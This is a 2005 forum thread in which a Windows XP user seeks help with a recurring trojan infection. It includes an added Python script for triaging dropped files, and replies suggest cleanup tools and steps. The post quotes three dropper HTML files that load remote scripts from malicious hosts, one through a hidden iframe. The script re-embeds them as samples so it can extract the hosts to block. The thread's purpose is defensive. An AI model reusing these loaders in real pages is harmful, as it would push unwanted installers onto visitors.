virus, tried everything
Original Message

Name: sirgregory1st
Date: January 15, 2005 at 16:04:55 Pacific
Subject: virus, tried everything
OS: win xp
CPU/Ram: 256

Comment: I have a virus, or maybe more, and I have tried everything; the best help I get is "format your hard drive"... ;( (There must be a better way; that means they win.)

Symptoms: AVG keeps popping up with "You have a virus: Startpage.10.AE" and deletes "mtwirl.dll" (this recurs about every 30 min whenever connected to the internet). In addition, there is something creating "tempf##.exe" files that try to access the internet, starting with "tempf01.exe", "tempf02.exe", all the way to "tempf40.exe" or so; there is also one now called "tempf0;.exe". All of which return if deleted. There are 3 new icons on the desktop called "as", "bad" and "156172". If I rename them to .txt files they contain:

<html> <body> <script language="javascript" type="text/javascript" src="http://static.windupdates.com/prompts/a270ae77/a679a0.js"></script> <script language="javascript" type="text/javascript">self.focus();</script> </body> </html>

and

<html> <body> <iframe id="content" style="position:absolute; visibility:hidden;"></iframe> <script language="JavaScript" src="http://www.mt-download.com/mtrslib2.js"></script> <script language="JavaScript"> mtrslib_uid = '4205'; mtrslib_retry = 1; mt_set_onload(); </script> </body> </html>

and

<html> <body> <script language="JavaScript" type="text/JavaScript" src="http://install.xxxtoolbar.com/ist/scripts/prompt.php?event_type=onload&recurrence=always&retry=0&loadfirst=0&delayload=0&account_id=156172&adid=a1101746764"></script> </body> </html>

I think I have gotten rid of the majority of these problems; however, the biggest thing is that all of the above keep coming back.

Already tried:
No help from the AVG trojan description (it just gives me standard Startpage descriptions).
System Restore is turned off and has been for a while; I keep checking to make sure.
HijackThis = cleaned.
cwsreader = no problems.
Other online virus/trojan scanners = no problems.
Trojan Remover = no problems.
Trojan Hunter = no problems.
Followed steps to remove xxx.toolbar (none of the fix reg entries existed).
Tried various other Startpage fixes, including but not limited to Trojan.startpage.E (none of the fix reg entries existed).
Tried msconfig and put ";" before the only two curious-looking entries (Indigo Rose ;C:\WINDOWS\iun3405.exe=1 and Gravity Well ;licno=DEMO ;authcode=DEMO).
I scanned the registry and deleted all keys that had mtwirl in them (they just come back), particularly HKEY_CLASSES_ROOT\CLSID\{DABB03E9-AC0D-3740-E3E5-4B37C80837E5}\InProcServer32.
I scanned the registry and deleted all keys that had tempf in them, particularly HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Explorer Bars\{C4EE31F3-4768-11D2-BE5C-00A0C9A83DA1}.
I scanned the registry for all Search Assistant entries and deleted them (I was frustrated... ended up losing the little guy (dog or wizard guy) on the Windows Start menu search; I'll fix that later).
Oh yeah, I updated Windows' recommended service packs too.
Tried Spybot S&D and Ad-Aware (both are updated, as is my AVG).

Other info: the IP that the tempf files try to go to is Destination IP: 127.0.0.1; the port used is Port 1789 (caught by ZoneAlarm every 3 min. or so). My start page is fine, no redirects; it's just the annoyance of the mtwirl that keeps trying to install, and those tempf files that keep trying to access the internet.

Oh yeah, one more thing: the AVG email scanner kept popping up saying I was emailing various places. I use Hotmail so I don't get it, but it seems to have stopped at some point during the fixes I have tried... OK, any ideas? Thank you.

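As an added example, not part of the original post or of any reply in this thread, the script below shows how a practitioner would triage the desktop files described above without renaming them: sniff the content instead of trusting the name, and pull the remote script URLs out of any HTML dropper found. The three HTML bodies quoted in the post are embedded as constructed sample files (using the poster's file names "as", "bad" and "156172"); the "tempf01.exe" stand-in holds only an "MZ" signature and is not a real binary; the temp directory and all function names are this example's own.

```python
"""Offline triage of dropped HTML loaders: content sniffing plus indicator extraction."""
import os
import re
import tempfile
from urllib.parse import urlparse, parse_qs

# Bodies of the three desktop files quoted in the post (file names are the
# poster's). Embedded here as constructed sample input so the script runs offline.
DROPPERS = {
    "as": (
        '<html> <body> <script language="javascript" type="text/javascript" '
        'src="http://static.windupdates.com/prompts/a270ae77/a679a0.js"></script> '
        '<script language="javascript" type="text/javascript">self.focus();</script> '
        '</body> </html>'
    ),
    "bad": (
        '<html> <body> <iframe id="content" style="position:absolute; visibility:hidden;"></iframe> '
        '<script language="JavaScript" src="http://www.mt-download.com/mtrslib2.js"></script> '
        "<script language=\"JavaScript\"> mtrslib_uid = '4205'; mtrslib_retry = 1; mt_set_onload(); </script> "
        '</body> </html>'
    ),
    "156172": (
        '<html> <body> <script language="JavaScript" type="text/JavaScript" '
        'src="http://install.xxxtoolbar.com/ist/scripts/prompt.php?event_type=onload&recurrence=always'
        '&retry=0&loadfirst=0&delayload=0&account_id=156172&adid=a1101746764"></script> '
        '</body> </html>'
    ),
}

# <script ... src="..."> with the src attribute inside the opening tag only.
SCRIPT_SRC = re.compile(r'<script\b[^>]*\bsrc\s*=\s*["\']([^"\']+)["\']', re.I)
# Leading HTML tag, checked on the first bytes regardless of file extension.
HTML_HEAD = re.compile(rb'^\s*<(!doctype\s+html|html|body|script|iframe)\b', re.I)


def looks_like_html(data: bytes) -> bool:
    """Content sniff: does the file start with an HTML tag, whatever its name says?"""
    return HTML_HEAD.match(data[:256]) is not None


def remote_scripts(html: str) -> list[str]:
    """Every absolute http(s) URL loaded through <script src=...> in the markup."""
    return [u for u in SCRIPT_SRC.findall(html) if u.lower().startswith(("http://", "https://"))]


def triage_file(path: str) -> dict:
    """Classify one file and extract the remote-loader indicators it carries."""
    with open(path, "rb") as f:
        data = f.read()
    is_html = looks_like_html(data)
    urls = remote_scripts(data.decode("utf-8", errors="replace")) if is_html else []
    params: dict = {}
    for u in urls:
        params.update(parse_qs(urlparse(u).query))  # e.g. an affiliate account_id
    return {
        "ext": os.path.splitext(path)[1].lower(),
        "is_html": is_html,
        "urls": urls,
        "hosts": sorted({urlparse(u).hostname for u in urls}),
        "params": params,
    }


def triage_dir(directory: str) -> dict:
    """Run triage_file over every regular file in a directory (e.g. the Desktop)."""
    report = {}
    for name in sorted(os.listdir(directory)):
        full = os.path.join(directory, name)
        if os.path.isfile(full):
            report[name] = triage_file(full)
    return report


def indicator_hosts(report: dict) -> list[str]:
    """Union of remote hosts across all HTML droppers: the block list for HOSTS/firewall."""
    return sorted({h for r in report.values() for h in r["hosts"]})


def build_sample_dir() -> str:
    """Write the constructed sample files to a temp directory and return its path."""
    d = tempfile.mkdtemp(prefix="triage_")
    for name, body in DROPPERS.items():
        with open(os.path.join(d, name), "w", encoding="utf-8") as f:
            f.write(body)
    # Constructed stand-in for a dropped PE file: just the "MZ" signature, not a
    # real binary. It shows that content sniffing keeps it out of the HTML set.
    with open(os.path.join(d, "tempf01.exe"), "wb") as f:
        f.write(b"MZ" + b"\x00" * 62)
    return d


if __name__ == "__main__":
    rep = triage_dir(build_sample_dir())
    for name, r in rep.items():
        print(f"{name:12} html={r['is_html']!s:5} hosts={r['hosts']} params={r['params']}")
    print("block these hosts:", indicator_hosts(rep))
```

Two things the output makes visible that the post only hints at: the third file's name ("156172") is the same value as the account_id query parameter in its loader URL, so the file is an affiliate-tagged installer prompt rather than a random drop; and the host list is what to block so the loaders cannot fetch their next stage while cleanup is in progress. The tempf files connecting to 127.0.0.1 port 1789 are a separate lead: something on the same machine is listening on that port, and on XP `netstat -ano` lists the owning PID for each listening socket, which identifies the process to examine next.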
Response Number 1

Name: Mentalpaused
Date: January 15, 2005 at 20:07:30 Pacific

Reply: I just had good luck with this site and its online scanner. It helped where AVG, Spybot, and many others didn't. Hope it works out. www.trendmicro.com/

Response Number 2

Name: ClydeB
Date: January 15, 2005 at 20:19:46 Pacific

Reply: By "having tried everything", do you mean that you have done a thorough virus scan, followed the instructions explicitly and still have the problem you describe? It looks like you are swinging wildly at a great number of things all at the same time. If not, the free scan at trendmicro.com is a starting place. Your system appears to be getting reinfected as soon as you connect again. A competent virus program up and RUNNING is a must before further exposure. By the way, are your important files backed up? You may have to do a clean install of XP to correct everything you have in trouble.

Response Number 3

Name: RoadRunner
Date: January 15, 2005 at 21:13:37 Pacific

Reply: Have a look at the link below and see whether you have the same problem: http://forums.maddoktor2.com/index.php?showtopic=304

Response Number 4

Name: RoadRunner
Date: January 16, 2005 at 06:01:25 Pacific

Reply:
1) Download the following three items...
McAfee Stinger: http://vil.nai.com/vil/stinger/
Trend Sysclean Package: http://www.trendmicro.com/download/dcs.asp
Latest Trend signature files: http://www.trendmicro.com/download/pattern.asp
Create a directory on drive "C:\" (e.g., "c:\New Folder") or the desktop (e.g., "C:\Documents and Settings\lipman\Desktop\New Folder"). Download SYSCLEAN.COM and place it in that directory. Download the signature files (pattern files) by obtaining the ZIP file, for example lpt351.zip. Extract the contents of the ZIP file and place the contents in the same directory as SYSCLEAN.COM.
2) If you are using WinME or WinXP, disable System Restore: http://vil.nai.com/vil/SystemHelpDocs/DisableSysRestore.htm
3) Reboot your PC into Safe Mode and shut down as many applications as possible.
4) Using both the Trend Sysclean utility and Stinger, perform a Full Scan of your platform and clean/delete any infectors found.
5) Restart your PC and perform a "final" Full Scan of your platform using both.
6) If you are using WinME or WinXP, re-enable System Restore and re-apply any System Restore preferences (e.g. HD space to use, suggested 400 ~ 600MB).
7) Reboot your PC.
8) If you are using WinME or WinXP, create a new Restore point.
Also have a look at the Norton website: http://tinyurl.com/3b9ps

Response Number 5

Reply: Thanks for the suggestions, I am trying them now. I will let you know how they work. And to ClydeB: yeah, I followed the instructions explicitly, all the way down to which things to delete and when to restart. I do have a question though: do you think AVG is not a competent virus program? I've heard nothing but good things about it (but it isn't helping me here...). And I backed up my files with the AVG startup disk, and the registry is backed up with System Mechanic. Thanks... thank you.

Response Number 6

Name: ClydeB
Date: January 16, 2005 at 11:00:14 Pacific

Reply: I can't comment on AVG. I was concerned that you would further expose your PC to damage by NOT using any protection. How about backup, could you tolerate a clean install if needed?

Response Number 7

Reply: Yeah, I suppose, but only as a last resort... mainly because I'm lazy, lol. Mostly scared of locating my XP disk and all the XP downloads that I think I would have to redownload (56k modem)... The www.trendmicro.com/ scan that was suggested above (I thought I ran it twice before) this time picked up the virus making the tmpf files and the problem dll: Troj_Haxdoor.AY OsCZE.dll, Troj_ISTBAR.AL (the tmpf files). It couldn't fix them with the online scanner though. Trying to delete OxCZE.dll with KillBox, and I've downloaded the fixes that RoadRunner suggested; will try that now. Also found the trojans in the scan list for the A2 trojan scanner, downloading the free version now; will try that and this trial edition of a program from proantivirus.com, which says it scans for haxdoor.ay on its site. We will see. OK, now I will try the rest. I will let you know if they work. Thank you.

Response Number 8

Name: RoadRunner
Date: January 16, 2005 at 11:56:37 Pacific

Reply: Hey there... I use both AVG Free and the Pro version on a few computers, and I don't have problems with either of them. You might want to try the AVG forum site; have a look at the link below: http://forum.grisoft.cz/freeforum/index.php?0
